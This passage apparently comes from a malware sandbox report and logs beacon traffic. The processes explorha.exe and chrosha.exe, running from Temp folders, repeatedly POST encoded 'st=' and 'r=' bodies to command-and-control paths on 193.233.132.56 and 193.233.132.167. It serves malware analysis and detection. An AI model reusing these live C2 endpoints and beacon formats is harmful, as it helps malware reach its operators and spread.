                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:31.274348974 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:31 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      989192.168.2.550841193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:31.043504953 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:31.295036077 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:31 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      990192.168.2.550842193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:31.547379971 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:31.799392939 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:31 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      991192.168.2.550843193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:31.635654926 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:31.885045052 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:31 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      992192.168.2.550844193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:32.146002054 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:32.403027058 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:32 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      993192.168.2.550846193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:32.176044941 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:32.424511909 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:32 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      994192.168.2.550847193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:32.750264883 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:32.989425898 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:32 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      995192.168.2.550849193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:32.803952932 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:33.051019907 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:32 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      996192.168.2.550850193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:33.235330105 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:33.482317924 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:33 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      997192.168.2.550851193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:33.415332079 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:33.662297964 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:33 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      998192.168.2.550852193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:33.834254980 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:34.079785109 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:33 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      999192.168.2.550853193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:33.913750887 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:34.164621115 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:34 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1000192.168.2.550854193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:34.330091000 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:34.578963041 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:34 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1001192.168.2.550855193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:34.522779942 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:34.766560078 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:34 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1002192.168.2.550856193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:34.944438934 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:35.189697981 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:35 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1003192.168.2.550857193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:35.019114971 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:35.272346973 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:35 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1004192.168.2.550858193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:35.451021910 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
